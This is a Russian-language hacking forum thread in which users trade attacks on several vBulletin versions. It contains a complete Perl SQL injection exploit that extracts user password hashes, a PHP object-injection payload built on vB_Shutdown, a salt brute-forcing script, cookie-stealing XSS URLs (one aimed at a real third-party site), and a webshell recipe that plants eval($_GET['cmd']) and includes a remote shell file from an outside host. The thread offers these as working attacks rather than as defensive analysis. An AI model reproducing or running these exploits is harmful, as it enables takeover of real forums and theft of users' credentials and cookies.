Да я уже понял, что там ошибка, только пока её не исправил. Структура данных там такая: vB_Shutdown Object ( [shutdown] => Array ( [0] => phpinfo ) ) Надо её исправить...
budden, попробую вписать eval($_GET[cmd]), дальше site.ru/forum/faq.php?cmd=phpinfo(); или сразу весь код шелла запихнуть, дальше site.ru/forum/faq.php смотри что вышло P.S не в ту тему написал
Раскрытие путей vBulletin® Version 3.8.4 Code: localhost/vb/calendar.php?do[]=[]add&[]type=[]recur&c=[]%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E Code: Warning: trim() expects parameter 1 to be string, array given in C:\xampp\htdocs\vb\includes\class_core.php on line 1651 Уязвимый код: PHP: function xss_clean($var) { static $preg_find = array('#^javascript#i', '#^vbscript#i'), $preg_replace = array('java script', 'vb script'); return preg_replace($preg_find, $preg_replace, htmlspecialchars(trim($var))); } UPD Code: http://localhost/vb/forumdisplay.php?do[] Code: Unable to add cookies, header already sent. File: C:\xampp\htdocs\vb\includes\class_core.php Line: 3277 Code: Warning: trim() expects parameter 1 to be string, array given in C:\xampp\htdocs\vb\includes\class_core.php on line 1651 Уязвимый код: PHP: foreach (array('_GET', '_POST') AS $arrayname) { if (isset($GLOBALS["$arrayname"]['do'])) { $GLOBALS["$arrayname"]['do'] = trim($GLOBALS["$arrayname"]['do']); } $this->convert_shortvars($GLOBALS["$arrayname"]); } Все GET и POST данные с параметром будет обрабатываться функцией trim,а если сделать их массивом,возникает ошибка. (C)Xcontrol212
Vbulletin 4.0.1 Remote SQL Injection п.с. хз пашет или нет... Code: #!/usr/bin/perl use IO::Socket; print q{ ####################################################################### # vBulletin™ Version 4.0.1 Remote SQL Injection Exploit # # By indoushka # # www.iq-ty.com/vb # # Souk Naamane (00213771818860) # # Algeria Hackerz ([email protected]) # # Dork: Powered by vBulletin™ Version 4.0.1 # ####################################################################### }; if (!$ARGV[2]) { print q{ Usage: perl VB4.0.1.pl host /directory/ victim_userid perl VB4.0.1.pl www.vb.com /forum/ 1 }; } $server = $ARGV[0]; $dir = $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; print "------------------------------------------------------------------------------------------------\r\n"; print "[>] SERVER: $server\r\n"; print "[>] DIR: $dir\r\n"; print "[>] USERID: $user\r\n"; print "------------------------------------------------------------------------------------------------\r\n\r\n"; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ; print "[~] PREPARE TO CONNECT...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTED\r\n"; print "[~] SENDING QUERY...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "[+] DONE!\r\n\r\n"; print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "Password is: ".$1."\r\n"; print "--------------------------------------------------------------------------------------\r\n"; } exit(); } } print "------------------------------------------------------------------------------------------------\r\n";
регулярка для хоста неправильная, но по всей видимости это спецпорог, т.к. очевидно, что специальная ошибка
Потомучто там Code: $temp = unserialize($check); if ($temp['do'] == 'doenterpwd') { $vbulletin->GPC['postvars'] = ''; } Соответственно переделываем сериализованную часть: echo serialize(array('do'=>'do', 'obj' => new vB_Shutdown)); Code: a:2:{s:2:"do";s:2:"do";s:3:"obj";O:11:"vB_Shutdown":1:{s:8:"shutdown";a:1:{i:0;s:7:"phpinfo";}}} но как с толком использовать вызов функции без параметров? ps У нуленых by DGT 'COOKIE_SALT' не пустой. pss, но вполне брутабельный. Брутится исходя из куки "bbforum_view". Например f544eb9368b8ac964d27534650bff240510eb278a-1-{i-3_i-1267278281_} Первые 40 символов это хэш соленого сериал. массива: Code: $c = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_'; // 36 chars // 20 $inp = intval(@$argv[1]); $salt = 'VBF'; for ($a1 = $inp; $a1 <= 35; $a1++) { $salt[3] = $c[$a1]; for ($a2 = 0; $a2 <= 35; $a2++) { $salt[4] = $c[$a2]; for ($a3 = 0; $a3 <= 35; $a3++) { $salt[5] = $c[$a3]; for ($a4 = 0; $a4 <= 35; $a4++) { $salt[6] = $c[$a4]; echo $salt."\n"; for ($a5 = 0; $a5 <= 35; $a5++) { $salt[7] = $c[$a5]; for ($a6 = 0; $a6 <= 35; $a6++) { $salt[8] = $c[$a6]; for ($a7 = 0; $a7 <= 35; $a7++) { $salt[9] = $c[$a7]; if (sha1('a-1-{i-3_i-1267278281_}' . sha1($salt) ) === 'f544eb9368b8ac964d27534650bff240510eb278') die('Found: '.$salt); } } } } } } } для большинства форумов 3.8.2 ~ 3.8.4 подходит: Может сказать что не существует такого форума, тогда надо будет подшаманить ?f=26 http://site.com/forumdisplay.php?f=26&do=doenterpwd&newforumpwd=&postvars=efeba30e34b02bd0fcdb07795c42eaedad5bf111a:2:{s:2:%22do%22;s:2:%22do%22;s:3:%22obj%22;O:11:%22vB_Shutdown%22:1:{s:8:%22shutdown%22;a:3:{i:0;s:7:%22phpinfo%22;i:1;s:21:%22debug_print_backtrace%22;i:2;s:3:%22die%22;}}} Никто так и не придумал как эту багу использовать то? :/
Нашол минут 5 назад. Незнаю боян не боян, но у себя на форуме версии 3.8.2 когда заходишь в профиль можно написать "Публичное сообщение" Такой код проходит свободно. ><script>alert(/byby/)</script>
vBulletin® версия 3.7.0 Gold http://forum/serverChecker/?IP=**.**.***.***&port=29901"><script>alert(document.cookie)</script> (c)Feldmarschall
Vbulletin 4.0.2 XSS Vulnerability Code: ================================= Vbulletin 4.0.2 XSS Vulnerability ================================= [+] Vbulletin 4.0.2 XSS Vulnerability 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm 5ubzer0 member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered By: 5ubzer0 [+] My id : http://inj3ct0r.com/author/2307 [+] Original : http://inj3ct0r.com/exploits/9697 # Version: Vbulletin 4.0.2 www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script> www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script> Exemple: http://www.forumjogosonline.com.br/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E # ~ - [ [ : Inj3ct0r : ] ] # Inj3ct0r.com [2010-03-19]
Как вы задолбали =\ Не надо ставить копирайты на этого inj3ct0r'а - это копипастер\плагиатор. Посмотрите у китайцев, эта бага лежит с 9 числа, и если этот клоун поставил туда своё авторство, это не значит, что он автор http://sebug.net/vulndb/19240/
Банальная XSS. vBulletin® Version 3.8.2 Code: http://site.ru/forum/modcp/index.php?loc=javascript:document.write('<script>alert(document.cookie);</script>'); PS. В теме не нашел, в гугле тоже не заметил, что кто то выкладывал.
Продукт: ставим vBulletin Месторасположение: Vbulletin: Справка - faq_complete Вставляем в тело код нашего шелла eval($_GET['cmd']); Сохраняем, идём в faq (справка), если он был такой eval($_GET['cmd']); делаем так site.сom/forumpath/faq.php?cmd=тут команда site.сom/forumpath/faq.php?cmd=include($_GET[aa]);&aa=http://site.com/shell.txt Требуется allow_url_include = on
=============================================================== vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability ===============================================================
хм... можно получить. только если баг не пофиксен самим админом... действует для 3.8.4 и 3.8.5 (нужно регить админа под логином admin... не помню точно. полистай странички этой темы тут есть. только текст на инглише написан... выглядит как эксплоит...=) красота... а если быть точнее, то подними глаза на верх страницы. =) это он и есть... ADMIN�
